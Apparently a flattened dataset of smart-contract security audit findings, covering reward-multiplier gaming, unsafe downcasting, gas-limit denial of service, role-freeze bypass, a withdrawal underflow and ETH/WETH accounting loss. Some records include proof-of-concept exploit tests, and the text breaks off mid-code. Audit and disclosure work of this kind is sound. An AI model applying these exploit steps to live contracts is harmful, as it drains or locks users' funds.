Multiplier calculation should take into account the duration of the lock.\\nA staker stakes an amount of tokens.\\nThe staker waits for some time\\nThe staker has control of another member (bribe, ...)\\nThe staker vouches this other member\\nThe member borrows\\nThe staker calls `Comptroller:withdrawRewards` and gets an amount of rewards with a multiplier corresponding to a locked stake\\nThe member repays the loan\\nNote that steps 4 to 7 can be made in one tx, so no interest is paid at step 7.\\nThe result is that the staker can always get the full multiplier for rewards, without ever putting any funds at risk, nor any interest being paid. This is done at the expense of other honest stakers, who get proprotionally less of the rewards dripped into the comptroller.\\nFor a coded PoC replace the test `\"staker with locked balance gets more rewards\"` in `staking.ts` with the following\\n```\\n it(\"PoC: staker with locked balance gets more rewards even when just locked\", async () => {\\n const trustAmount = parseUnits(\"2000\");\\n const borrowAmount = parseUnits(\"1800\");\\n const [account, staker, borrower] = members;\\n\\n const [accountStaked, borrowerStaked, stakerStaked] = await helpers.getStakedAmounts(\\n account,\\n staker,\\n borrower\\n );\\n\\n expect(accountStaked).eq(borrowerStaked);\\n expect(borrowerStaked).eq(stakerStaked);\\n\\n await helpers.updateTrust(staker, borrower, trustAmount);\\n \\n await roll(10);\\n await helpers.borrow(borrower, borrowAmount); // borrows just after withdrawing\\n \\n const [accountMultiplier, stakerMultiplier] = await helpers.getRewardsMultipliers(account, staker);\\n console.log(\"accountMultiplier: \", accountMultiplier);\\n console.log(\"StakerMultiplier: \", stakerMultiplier);\\n expect(accountMultiplier).lt(stakerMultiplier); // the multiplier is larger even if just locked\\n });\\n```\\nчIssue A stake that has just been locked gets full reward multiplier\\nShould introduce the accounting of the duration of a 
lock into the rewards calculation, so that full multiplier is given only to a lock that is as old as the stake itself.чA staker can get larger rewards designed for locked stakes by locking and unlocking in the same tx.ч```\\n it(\"PoC: staker with locked balance gets more rewards even when just locked\", async () => {\\n const trustAmount = parseUnits(\"2000\");\\n const borrowAmount = parseUnits(\"1800\");\\n const [account, staker, borrower] = members;\\n\\n const [accountStaked, borrowerStaked, stakerStaked] = await helpers.getStakedAmounts(\\n account,\\n staker,\\n borrower\\n );\\n\\n expect(accountStaked).eq(borrowerStaked);\\n expect(borrowerStaked).eq(stakerStaked);\\n\\n await helpers.updateTrust(staker, borrower, trustAmount);\\n \\n await roll(10);\\n await helpers.borrow(borrower, borrowAmount); // borrows just after withdrawing\\n \\n const [accountMultiplier, stakerMultiplier] = await helpers.getRewardsMultipliers(account, staker);\\n console.log(\"accountMultiplier: \", accountMultiplier);\\n console.log(\"StakerMultiplier: \", stakerMultiplier);\\n expect(accountMultiplier).lt(stakerMultiplier); // the multiplier is larger even if just locked\\n });\\n```\\n -updateTrust() vouchers also need check maxVouchersчmediumчmaxVouchers is to prevent the “vouchees“ array from getting too big and the loop will have the GAS explosion problem, but “vouchers“have the same problem, if you don't check the vouchers array, it is also possible that vouchers are big and cause updateLocked() to fail\\nvouchees check < maxVouchers ,but vouchers don't check\\n```\\n function updateTrust(address borrower, uint96 trustAmount) external onlyMember(msg.sender) whenNotPaused {\\n// rest of code\\n uint256 voucheesLength = vouchees[staker].length;\\n if (voucheesLength >= maxVouchers) revert MaxVouchees();\\n\\n\\n uint256 voucherIndex = vouchers[borrower].length;\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, 
trustAmount, 0, 0)); /**** don't check maxVouchers****/\\n```\\nч```\\n function updateTrust(address borrower, uint96 trustAmount) external onlyMember(msg.sender) whenNotPaused {\\n// rest of code\\n uint256 voucheesLength = vouchees[staker].length;\\n if (voucheesLength >= maxVouchers) revert MaxVouchees();\\n\\n\\n uint256 voucherIndex = vouchers[borrower].length;\\n+ if (voucherIndex >= maxVouchers) revert MaxVouchees();\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0)); \\n```\\nчit is also possible that vouchers are big and cause updateLocked() to failч```\\n function updateTrust(address borrower, uint96 trustAmount) external onlyMember(msg.sender) whenNotPaused {\\n// rest of code\\n uint256 voucheesLength = vouchees[staker].length;\\n if (voucheesLength >= maxVouchers) revert MaxVouchees();\\n\\n\\n uint256 voucherIndex = vouchers[borrower].length;\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0)); /**** don't check maxVouchers****/\\n```\\n -Unsafe downcasting arithmetic operation in UserManager related contract and in UToken.solчmediumчThe value is unsafely downcasted and truncated from uint256 to uint96 or uint128 in UserManager related contract and in UToken.sol.\\nvalue can unsafely downcasted. 
let us look at it cast by cast.\\nIn UserManagerDAI.sol\\n```\\n function stakeWithPermit(\\n uint256 amount,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n ) external whenNotPaused {\\n IDai erc20Token = IDai(stakingToken);\\n erc20Token.permit(msg.sender, address(this), nonce, expiry, true, v, r, s);\\n\\n stake(uint96(amount));\\n }\\n```\\n\\nas we can see, the user's staking amount is downcasted from uint256 to uint96.\\nthe same issue exists in UserManagerERC20.sol\\nIn the context of UToken.sol, a bigger issue comes.\\nUser invokes the borrow function in UToken.sol\\n```\\n function borrow(address to, uint256 amount) external override onlyMember(msg.sender) whenNotPaused nonReentrant {\\n```\\n\\nand\\n```\\n // Withdraw the borrowed amount of tokens from the assetManager and send them to the borrower\\n if (!assetManagerContract.withdraw(underlying, to, amount)) revert WithdrawFailed();\\n\\n // Call update locked on the userManager to lock this borrowers stakers. This function\\n // will revert if the account does not have enough vouchers to cover the borrow amount. ie\\n // the borrower is trying to borrow more than is able to be underwritten\\n IUserManager(userManager).updateLocked(msg.sender, uint96(amount + fee), true);\\n```\\n\\nnote when we withdraw fund from asset Manager, we use a uint256 amount, but we downcast it to uint96(amount + fee) when updating the locked. 
The accounting would be so broken if the amount + fee is a larger than uint96 number.\\nSame issue in the function UToken.sol# _repayBorrowFresh\\n```\\n function _repayBorrowFresh(\\n address payer,\\n address borrower,\\n uint256 amount\\n ) internal {\\n```\\n\\nand\\n```\\n // Update the account borrows to reflect the repayment\\n accountBorrows[borrower].principal = borrowedAmount - repayAmount;\\n accountBorrows[borrower].interest = 0;\\n```\\n\\nand\\n```\\n IUserManager(userManager).updateLocked(borrower, uint96(repayAmount - interest), false);\\n```\\n\\nwe use a uint256 number for borrowedAmount - repayAmount, but downcast it to uint96(repayAmount - interest) when updating the lock!\\nNote there are index-related downcasting, the damage is small , comparing the accounting related downcasting.because it is difference to have uint128 amount of vouch, but I still want to mention it: the index is unsafely downcasted from uint256 to uint128\\n```\\n // Get the new index that this vouch is going to be inserted at\\n // Then update the voucher indexes for this borrower as well as\\n // Adding the Vouch the the vouchers array for this staker\\n uint256 voucherIndex = vouchers[borrower].length;\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0));\\n\\n // Add the voucherIndex of this new vouch to the vouchees array for this\\n // staker then update the voucheeIndexes with the voucheeIndex\\n uint256 voucheeIndex = voucheesLength;\\n vouchees[staker].push(Vouchee(borrower, uint96(voucherIndex)));\\n voucheeIndexes[borrower][staker] = Index(true, uint128(voucheeIndex));\\n```\\n\\nThere are block.number related downcasting, which is a smaller issue.\\n```\\nvouch.lastUpdated = uint64(block.number);\\n```\\nчJust use uint256, or use openzepplin safeCasting.чThe damage level from the number truncation is rated by:\\nUToken borrow and repaying downcasting > staking amount downcating 
truncation > the vouch index related downcasting. > block.number casting.ч```\\n function stakeWithPermit(\\n uint256 amount,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n ) external whenNotPaused {\\n IDai erc20Token = IDai(stakingToken);\\n erc20Token.permit(msg.sender, address(this), nonce, expiry, true, v, r, s);\\n\\n stake(uint96(amount));\\n }\\n```\\n -getUserInfo() returns incorrect values for locked and stakedAmountчmediumчThe `getUserInfo()` function mixes up the values for `locked` and `stakedAmount`, so the value for each of these is returned for the other.\\nIn UnionLens.sol, the `getUserInfo()` function is used to retrieve information about a given user.\\nIn order to pull the user's staking information, the following function is called:\\n```\\n(bool isMember, uint96 locked, uint96 stakedAmount) = userManager.stakers(user);\\n```\\n\\nThis function is intended to return these three values from the UserManager.sol contract. However, in that contract, the function being called returns a Staker struct, which has the following values:\\n```\\nstruct Staker {\\n bool isMember;\\n uint96 stakedAmount;\\n uint96 locked;\\n}\\n```\\n\\nBecause both `locked` and `stakedAmount` have the type `uint96`, the function does not revert, and simply returns the incorrect values to the caller.чReverse the order of return values in the `getUserInfo()` function, so that it reads:\\n```\\n(bool isMember, uint96 stakedAmount, uint96 locked) = userManager.stakers(user);\\n```\\nчAny user or front end calling the `getUserInfo()` function will be given incorrect values, which could lead to wrong decisions.ч```\\n(bool isMember, uint96 locked, uint96 stakedAmount) = userManager.stakers(user);\\n```\\n -`AssetManager.rebalance()` will revert when the balance of `tokenAddress` in the money market is 0.чmediumч`AssetManager.rebalance()` will revert when the balance of `tokenAddress` in the money market is 0.\\nAssetManager.rebalance() tries to 
withdraw tokens from each money market for rebalancing here.\\n```\\n // Loop through each money market and withdraw all the tokens\\n for (uint256 i = 0; i < moneyMarketsLength; i++) {\\n IMoneyMarketAdapter moneyMarket = moneyMarkets[i];\\n if (!moneyMarket.supportsToken(tokenAddress)) continue;\\n moneyMarket.withdrawAll(tokenAddress, address(this));\\n\\n supportedMoneyMarkets[supportedMoneyMarketsSize] = moneyMarket;\\n supportedMoneyMarketsSize++;\\n }\\n```\\n\\nWhen the balance of the `tokenAddress` is 0, we don't need to call `moneyMarket.withdrawAll()` but it still tries to call.\\nBut this will revert because Aave V3 doesn't allow to withdraw 0 amount here.\\n```\\n function validateWithdraw(\\n DataTypes.ReserveCache memory reserveCache,\\n uint256 amount,\\n uint256 userBalance\\n ) internal pure {\\n require(amount != 0, Errors.INVALID_AMOUNT);\\n```\\n\\nSo `AssetManager.rebalance()` will revert if one money market has zero balance of `tokenAddress`.чIssue `AssetManager.rebalance()` will revert when the balance of `tokenAddress` in the money market is 0.\\nI think we can modify AaveV3Adapter.withdrawAll() to work only when the balance is positive.\\n```\\n function withdrawAll(address tokenAddress, address recipient)\\n external\\n override\\n onlyAssetManager\\n checkTokenSupported(tokenAddress)\\n {\\n address aTokenAddress = tokenToAToken[tokenAddress];\\n IERC20Upgradeable aToken = IERC20Upgradeable(aTokenAddress);\\n uint256 balance = aToken.balanceOf(address(this));\\n\\n if (balance > 0) {\\n lendingPool.withdraw(tokenAddress, type(uint256).max, recipient);\\n }\\n }\\n```\\nчThe money markets can't be rebalanced if there is no balance in at least one market.ч```\\n // Loop through each money market and withdraw all the tokens\\n for (uint256 i = 0; i < moneyMarketsLength; i++) {\\n IMoneyMarketAdapter moneyMarket = moneyMarkets[i];\\n if (!moneyMarket.supportsToken(tokenAddress)) continue;\\n moneyMarket.withdrawAll(tokenAddress, 
address(this));\\n\\n supportedMoneyMarkets[supportedMoneyMarketsSize] = moneyMarket;\\n supportedMoneyMarketsSize++;\\n }\\n```\\n -gas limit DoS via unbounded operationsчmediumчOnly one attack will lead to two types of vulnerabilities in `UserManager.sol` and `UToken.sol`\\nOn `UserManager.sol` ==> `updateTrust()` Case one: malicious users (members) can keep `vouching` Alice with `trustAmount == 0` until his `vouchers` array achieves the max limit (2**256-1) So when a normal member tries to give `vouching` to Alice with `trustAmount != 0` he will fail because the `vouchers` array is completely full.\\nCase two (which is more realistic ): malicious users (members) can keep `vouching` Alice with `trustAmount == 0` until his `vouchers` array achieves, let's say, 20% of max limit (2**256-1) The problem is when Alice invokes `borrow()` or `repayBorrow()` on `UToken.sol`\\n```\\n IUserManager(userManager).updateLocked(msg.sender, uint96(amount + fee), true);\\n …\\n IUserManager(userManager).updateLocked(borrower, uint96(repayAmount - interest), false);\\n```\\n\\nIt will call `updateLocked()` on `UserManager.sol`\\n```\\n function updateLocked(\\n address borrower,\\n uint96 amount,\\n bool lock\\n ) external onlyMarket {\\n uint96 remaining = amount;\\n\\n for (uint256 i = 0; i < vouchers[borrower].length; i++) {\\n \\n```\\n\\nThe for loop could go through `vouchers[]` which could be long enough to lead to a \"gas limit DoS via unbounded operations\" And the same thing with `registerMember()`, any user could lose all their funds in this transaction\\n```\\n function registerMember(address newMember) public virtual whenNotPaused {\\n if (stakers[newMember].isMember) revert NoExistingMember();\\n\\n uint256 count = 0;\\n uint256 vouchersLength = vouchers[newMember].length;\\n\\n // Loop through all the vouchers to count how many active vouches there\\n // are that are greater than 0. 
Vouch is the min of stake and trust\\n for (uint256 i = 0; i < vouchersLength; i++) {\\n```\\nчAdd check for `trustAmount == 0`ч1- The user couldn't get any more `vouching` 2- The user will not be able to `borrow()` or `repayBorrow()` 3- No one can invoke `registerMember()` successfully for a specific userч```\\n IUserManager(userManager).updateLocked(msg.sender, uint96(amount + fee), true);\\n …\\n IUserManager(userManager).updateLocked(borrower, uint96(repayAmount - interest), false);\\n```\\n -Template implementations doesn't validate configurations properlyчmediumчIn past audits, we have seen contract admins claim that invalidated configuration setters are fine since “admins are trustworthy”. However, cases such as Nomad got drained for over $150M and Misconfiguration in the Acala stablecoin project allows attacker to steal 1.2 billion aUSD have shown again and again that even trustable entities can make mistakes. Thus any fields that might potentially result in insolvency of protocol should be thoroughly checked.\\nNftPort template implementations often ignore checks for config fields. For the rest of the issue, we take `royalty` related fields as an example to illustrate potential consequences of misconfigurations. Notably, lack of check is not limited to `royalty`, but exists among most config fields.\\nAdmins are allowed to set a wrong `royaltiesBps` which is higher than `ROYALTIES_BASIS`. `royaltyInfo()` will accept this invalid `royaltiesBps` and users will pay a large amount of royalty.\\nEIP-2981 (NFT Royalty Standard) defines `royaltyInfo()` function that specifies how much to pay for a given sale price. In general, royalty should not be higher than 100%. 
NFTCollection.sol checks that admins can't set royalties to more than 100%:\\n```\\n /// Validate a runtime configuration change\\n function _validateRuntimeConfig(RuntimeConfig calldata config)\\n internal\\n view\\n {\\n // Can't set royalties to more than 100%\\n require(config.royaltiesBps <= ROYALTIES_BASIS, \"Royalties too high\");\\n\\n // rest of code\\n```\\n\\nBut `NFTCollection` only check `royaltiesBps` when admins call `updateConfig()`, it doesn't check `royaltiesBps` in `initialize()` function, leading to admins could set an invalid `royaltiesBps` (higher than 100%) when initializing contracts.\\nThe same problem exists in ERC721NFTProduct and ERC1155NFTProduct. Both ERC721NFTProduct and ERC1155NFTProduct don't check `royaltiesBasisPoints` in `initialize()` function. Furthermore, these contracts also don't check `royaltiesBasisPoints` when admins call `update()` function. It means that admins could set an invalid `royaltiesBasisPoints` which may be higher than 100% in any time.чIssue Template implementations doesn't validate configurations properly\\nCheck `royaltiesBps <= ROYALTIES_BASIS` both in `initialize()` and `update()` functions.чEIP-2981 only defines `royaltyInfo()` that it should return royalty amount rather than royalty percentage. It means that if the contract has an invalid royalty percentage which is higher than 100%, `royaltyInfo()` doesn't revert and users will pay a large amount of royalty.ч```\\n /// Validate a runtime configuration change\\n function _validateRuntimeConfig(RuntimeConfig calldata config)\\n internal\\n view\\n {\\n // Can't set royalties to more than 100%\\n require(config.royaltiesBps <= ROYALTIES_BASIS, \"Royalties too high\");\\n\\n // rest of code\\n```\\n -Freezing roles in ERC721NFTProduct and ERC1155NFTProduct is mootчmediumчIn ERC721NFTProduct and ERC1155NFTProduct roles can be frozen which is supposed to lock role to current addresses and not allow any changes. 
The problem is that admin can still use AccessControlUpgradable#grantRole and revokeRole to grant and remove roles to addresses because hasRole allows \"ADMIN_ROLE\" to bypass all role restrictions even \"DEFAULT_ADMIN_ROLE\".\\n```\\nfunction hasRole(bytes32 role, address account)\\n public\\n view\\n virtual\\n override\\n returns (bool)\\n{\\n return\\n super.hasRole(ADMIN_ROLE, account) || super.hasRole(role, account);\\n}\\n```\\n\\nIn GranularRoles.sol and AccessControlUpgradable.sol, developers are careful to never grant the \"DEFAULT_ADMIN_ROLE\" to any user. Additionally they never set the admin role of any role so that it's admin will remain \"DEFAULT_ADMIN_ROLE\". In theory this should make so that there is no way to grant or revoke roles outside of GranularRoles#_initRoles and updateRoles. The issue is that the override by GranularRoles#hasRole allows \"ADMIN_ROLE\" to bypass any role restriction including \"DEFAULT_ADMIN_ROLE\". This allows \"ADMIN_ROLE\" to directly call AccessControlUpgradable#grantRole and revokeRole, which makes the entire freezing system useless as it doesn't actually stop any role modification.чOverride AccessControlUpgradable#grantRole and revokeRole in GranularRoles.sol to revert when called:\\n```\\n GranularRoles.sol\\n\\n+ function grantRole(bytes32 role, address account) public virtual override {\\n+ revert();\\n+ }\\n\\n+ function revokeRole(bytes32 role, address account) public virtual override {\\n+ revert();\\n+ }\\n```\\nчFreezing roles doesn't actually prevent \"ADMIN_ROLE\" from modifying roles as intended. 
Submitting as high due to gross over-extension of admin authority clearly violating intended guardrails.ч```\\nfunction hasRole(bytes32 role, address account)\\n public\\n view\\n virtual\\n override\\n returns (bool)\\n{\\n return\\n super.hasRole(ADMIN_ROLE, account) || super.hasRole(role, account);\\n}\\n```\\n -registerTemplate() can't handle properly when ITemplate version is 0чmediumчFactory.sol when register one template , and template ' s version is 0, the latestImplementation[templateName] will be address(0) and add other version, \"_templateNames\" will duplicate\\nWhen version is equal 0 latestImplementation[templateName] don't set\\n```\\n function _setTemplate(\\n string memory templateName,\\n uint256 templateVersion,\\n address implementationAddress\\n ) internal {\\n// rest of code\\n\\n if (latestImplementation[templateName] == address(0)) { /****add other version, _templateNames will duplicate ****/\\n _templateNames.push(templateName);\\n }\\n\\n if (templateVersion > latestVersion[templateName]) {\\n latestVersion[templateName] = templateVersion;\\n latestImplementation[templateName] = implementationAddress; /****templateVersion==0 , don't set ****/\\n }\\n\\n }\\n```\\nч```\\n function _setTemplate(\\n string memory templateName,\\n uint256 templateVersion,\\n address implementationAddress\\n ) internal {\\n\\n - if (templateVersion > latestVersion[templateName]) {\\n + if (templateVersion > = latestVersion[templateName]) {\\n latestVersion[templateName] = templateVersion;\\n latestImplementation[templateName] = implementationAddress; \\n }\\n```\\nчlatestImplementation[templateName] and _templateNames will error. 
external contracts may think there is no setup, resulting in duplicate setups that keep failingч```\\n function _setTemplate(\\n string memory templateName,\\n uint256 templateVersion,\\n address implementationAddress\\n ) internal {\\n// rest of code\\n\\n if (latestImplementation[templateName] == address(0)) { /****add other version, _templateNames will duplicate ****/\\n _templateNames.push(templateName);\\n }\\n\\n if (templateVersion > latestVersion[templateName]) {\\n latestVersion[templateName] = templateVersion;\\n latestImplementation[templateName] = implementationAddress; /****templateVersion==0 , don't set ****/\\n }\\n\\n }\\n```\\n -Factory uses signature that do not have expirationчmediumчNftPort can't remove license from user, once the signature was provided to it, without changing `SIGNER_ROLE` address.\\nIn Factory contract there are few methods that are called when signed by trusted signer.\\nThis is how the signature is checked\\n```\\nsignedOnly(abi.encodePacked(msg.sender, instance, data), signature)\\n```\\n\\nAs you can see there is no any expiration time. That means that once, the signer has signed the signature for the user it can use it for the end of life. It's like lifetime license. The only option to remove the license from user is to revoke `SIGNER_ROLE` and set it to another account. But it's possible that the NFTPort will have a need to do that with current signer.чAdd expiration param to the signature.чLicense can't be removed.ч```\\nsignedOnly(abi.encodePacked(msg.sender, instance, data), signature)\\n```\\n -Underflow in ```_previewWithdraw``` could prevent withdrawalsчhighчAn underflow in the `_previewWithdraw` function in `AuctionInternal.sol` due to totalContractsSold exceeding auction.totalContracts could prevent users from withdrawing options.\\nThe `_previewWithdraw` function returns the fill and refund amounts for a buyer by looping over all orders. 
A totalContractsSold variable is used to track the amount of contracts sold as the loop iterates over all orders. If the current order's size + totalContractsSold exceeds the auction's totalContracts then the order will only be filled partially. The calculation for the partial fill (remainder) is given on line 318. This will lead to an underflow if totalContractsSold > the auction's totalContracts which would happen if there are multiple orders that cause the totalContractsSold variable to exceed totalContracts.\\nThe totalContractsSold variable in `_previewWithdraw` could exceed the auction.totalContracts due to the contracts sold before the start of an auction through limit orders not being limited. When an order is added, `_finalizeAuction` is only called if the auction has started. The `_finalizeAuction` function will call the `_processOrders` function which will return true if the auction has reached 100% utilization. Since limit orders can be made before the start of an auction, `_finalizeAuction` is not called and any amount of new orders may be made.\\nExample: The buyer makes a limit order with size > auction.totalContracts. They then make another order with size of anything. These orders are made before the start of the auction so `_processOrders` is not called for every new order and totalContractsSold can exceed totalContracts. When `_previewWithdraw` is called, after the buyer's first order is processed, totalContractsSold > auction.totalContracts so the condition on line 313 passes. Since totalContractsSold > auction.totalContracts the calculation on line 318 underflows and the transaction reverts. 
The `_previewWithdraw` function and thus the `_withdraw` function is uncallable.\\nTest code added to `Auction.behaviour.ts`, under the `#addLimitOrder(uint64,int128,uint256)` section:\\n```\\n it(\"previewWithdraw reverts if buyer has too many contracts\", async () => {\\n assert.isEmpty(await auction.getEpochsByBuyer(addresses.buyer1));\\n\\n await asset\\n .connect(signers.buyer1)\\n .approve(addresses.auction, ethers.constants.MaxUint256);\\n\\n const totalContracts = await auction.getTotalContracts(epoch);\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.mul(2)\\n );\\n\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.div(2)\\n );\\n\\n const epochByBuyer = await auction.getEpochsByBuyer(addresses.buyer1);\\n\\n assert.equal(epochByBuyer.length, 1);\\n assert.bnEqual(epochByBuyer[0], epoch);\\n \\n await expect(auction.callStatic[\\n \"previewWithdraw(uint64)\"\\n ](epoch)).to.be.reverted;\\n });\\n```\\n\\nThe test code above shows a buyer is able to add an order with size auction.totalContracts*2 and a subsequent order with size auction.totalContracts/2. The `previewWithdraw` function reverts when called.чThe loop in `_previewWithdraw` should check if the current totalContractsSold is >= totalContracts. If it is then the remainder should be set to 0 which would allow the current order to be fully refunded.\\nAdditionally, the orders for an auction should be checked before the auction starts. In `_addOrder`, consider adding a condition that will call `_processOrders` if the auction has not started yet. If `_processOrders` returns true then do not allow the order to be added. 
Or just allow the auction to be finalized before it starts if the total contracts sold has reached the auction's totalContracts.чUsers would be unable to withdraw from the Auction contract.ч```\\n it(\"previewWithdraw reverts if buyer has too many contracts\", async () => {\\n assert.isEmpty(await auction.getEpochsByBuyer(addresses.buyer1));\\n\\n await asset\\n .connect(signers.buyer1)\\n .approve(addresses.auction, ethers.constants.MaxUint256);\\n\\n const totalContracts = await auction.getTotalContracts(epoch);\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.mul(2)\\n );\\n\\n await auction.addLimitOrder(\\n epoch,\\n fixedFromFloat(params.price.max),\\n totalContracts.div(2)\\n );\\n\\n const epochByBuyer = await auction.getEpochsByBuyer(addresses.buyer1);\\n\\n assert.equal(epochByBuyer.length, 1);\\n assert.bnEqual(epochByBuyer[0], epoch);\\n \\n await expect(auction.callStatic[\\n \"previewWithdraw(uint64)\"\\n ](epoch)).to.be.reverted;\\n });\\n```\\n -Users can avoid performance fees by withdrawing before the end of the epoch forcing other users to pay their feesчmediumчNo performance fees are taken when user withdraws early from the vault but their withdrawal value will be used to take fees, which will be taken from other users.\\n```\\nuint256 adjustedTotalAssets = _totalAssets() + l.totalWithdrawals;\\n\\nif (adjustedTotalAssets > l.lastTotalAssets) {\\n netIncome = adjustedTotalAssets - l.lastTotalAssets;\\n\\n feeInCollateral = l.performanceFee64x64.mulu(netIncome);\\n\\n ERC20.safeTransfer(l.feeRecipient, feeInCollateral);\\n}\\n```\\n\\nWhen taking the performance fees, it factors in both the current assets of the vault as well as the total value of withdrawals that happened during the epoch. Fees are paid from the collateral tokens in the vault, at the end of the epoch. Paying the fees like this reduces the share price of all users, which effectively works as a fee applied to all users. 
The problem is that withdrawals that take place during the epoch are not subject to this fee and the total value of all their withdrawals is added to the adjusted assets of the vault. This means that they don't pay any performance fee but the fee is still taken from the vault collateral. In effect they completely avoid the fee and force all the other users of the vault to pay it for them.чFees should be taken on withdrawals that occur before the vault is settledчUser can avoid performance fees and force other users to pay themч```\\nuint256 adjustedTotalAssets = _totalAssets() + l.totalWithdrawals;\\n\\nif (adjustedTotalAssets > l.lastTotalAssets) {\\n    netIncome = adjustedTotalAssets - l.lastTotalAssets;\\n\\n    feeInCollateral = l.performanceFee64x64.mulu(netIncome);\\n\\n    ERC20.safeTransfer(l.feeRecipient, feeInCollateral);\\n}\\n```\\n -processAuction() in VaultAdmin.sol can be called multiple times by keeper if the auction is canceled.чmediumчprocessAuction() in VaultAdmin.sol can be called multiple times by keeper if the auction is canceled.\\nprocessAuction() in VaultAdmin.sol can be called multiple times by keeper; the code below would execute more than once if the auction is canceled.\\nbecause it is the line of code inside the function processAuction in VaultAdmin.sol below that can change the auction status to PROCESSED.\\nthis code only runs when the auction is finalized; if not finalized, the auction is in Canceled State and\\n```\\n        bool cancelled = l.Auction.isCancelled(lastEpoch);\\n        bool finalized = l.Auction.isFinalized(lastEpoch);\\n\\n        require(\\n            (!finalized && cancelled) || (finalized && !cancelled),\\n            \"auction is not finalized nor cancelled\"\\n        );\\n```\\n\\nwould always pass because the auction is in the cancelled state.чIssue processAuction() in VaultAdmin.sol can be called multiple times by keeper if the auction is canceled.\\nWe recommend the project lock the epoch and make it impossible for keeper to call the processAuction again.чWhy the 
processAuction should not be called multiple times?\\nIn the first time it is called, the withdrawal lock is released so user can withdraw fund,\\n```\\n // deactivates withdrawal lock\\n l.auctionProcessed = true;\\n```\\n\\nthen if we called again, the lastTotalAssets can be updated multiple times.\\n```\\n // stores the last total asset amount, this is effectively the amount of assets held\\n // in the vault at the start of the auction\\n l.lastTotalAssets = _totalAssets();\\n```\\n\\nthe total asset can be lower and lower because people are withdrawing their fund.\\nthen when _collectPerformanceFee is called, the performance may still be collectedч```\\n bool cancelled = l.Auction.isCancelled(lastEpoch);\\n bool finalized = l.Auction.isFinalized(lastEpoch);\\n\\n require(\\n (!finalized && cancelled) || (finalized && !cancelled),\\n \"auction is not finalized nor cancelled\"\\n );\\n```\\n -`TradingUtils._executeTrade()` doesn't check `preTradeBalance` properly.чhighч`TradingUtils._executeTrade()` doesn't check `preTradeBalance` properly.\\n`TradingUtils._executeTrade()` doesn't check `preTradeBalance` properly.\\n```\\nfunction _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n) private {\\n uint256 preTradeBalance;\\n\\n if (trade.sellToken == address(Deployments.WETH) && spender == Deployments.ETH_ADDRESS) {\\n preTradeBalance = address(this).balance;\\n // Curve doesn't support Deployments.WETH (spender == address(0))\\n uint256 withdrawAmount = _isExactIn(trade) ? trade.amount : trade.limit;\\n Deployments.WETH.withdraw(withdrawAmount);\\n } else if (trade.sellToken == Deployments.ETH_ADDRESS && spender != Deployments.ETH_ADDRESS) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n // UniswapV3 doesn't support ETH (spender != address(0))\\n uint256 depositAmount = _isExactIn(trade) ? 
trade.amount : trade.limit;\\n Deployments.WETH.deposit{value: depositAmount }();\\n }\\n\\n (bool success, bytes memory returnData) = target.call{value: msgValue}(params);\\n if (!success) revert TradeExecution(returnData);\\n\\n if (trade.buyToken == address(Deployments.WETH)) {\\n if (address(this).balance > preTradeBalance) {\\n // If the caller specifies that they want to receive Deployments.WETH but we have received ETH,\\n // wrap the ETH to Deployments.WETH.\\n uint256 depositAmount;\\n unchecked { depositAmount = address(this).balance - preTradeBalance; }\\n Deployments.WETH.deposit{value: depositAmount}();\\n }\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS) {\\n uint256 postTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n if (postTradeBalance > preTradeBalance) {\\n // If the caller specifies that they want to receive ETH but we have received Deployments.WETH,\\n // unwrap the Deployments.WETH to ETH.\\n uint256 withdrawAmount;\\n unchecked { withdrawAmount = postTradeBalance - preTradeBalance; }\\n Deployments.WETH.withdraw(withdrawAmount);\\n }\\n }\\n}\\n```\\n\\nIt uses `preTradeBalance` to manage the WETH/ETH deposits and withdrawals.\\nBut it doesn't save the correct `preTradeBalance` for some cases.\\nLet's assume `trade.sellToken = some ERC20 token(not WETH/ETH), trade.buyToken = WETH`\\nBefore executing the trade, `preTradeBalance` will be 0 as both `if` conditions are false.\\nThen all ETH inside the contract will be converted to WETH and considered as a `amountBought` here and here.\\nAfter all, all ETH of the contract will be lost.\\nAll WETH of the contract will be lost also when `trade.sellToken = some ERC20 token(not WETH/ETH), trade.buyToken = ETH` here.чWe should check `preTradeBalance` properly. 
We can remove the current code for `preTradeBalance` and insert the below code before executing the trade.\\n```\\nif (trade.buyToken == address(Deployments.WETH)) {\\n preTradeBalance = address(this).balance;\\n} else if (trade.buyToken == Deployments.ETH_ADDRESS) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n}\\n```\\nчAll of ETH/WETH balance of the contract might be lost in some cases.ч```\\nfunction _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n) private {\\n uint256 preTradeBalance;\\n\\n if (trade.sellToken == address(Deployments.WETH) && spender == Deployments.ETH_ADDRESS) {\\n preTradeBalance = address(this).balance;\\n // Curve doesn't support Deployments.WETH (spender == address(0))\\n uint256 withdrawAmount = _isExactIn(trade) ? trade.amount : trade.limit;\\n Deployments.WETH.withdraw(withdrawAmount);\\n } else if (trade.sellToken == Deployments.ETH_ADDRESS && spender != Deployments.ETH_ADDRESS) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n // UniswapV3 doesn't support ETH (spender != address(0))\\n uint256 depositAmount = _isExactIn(trade) ? 
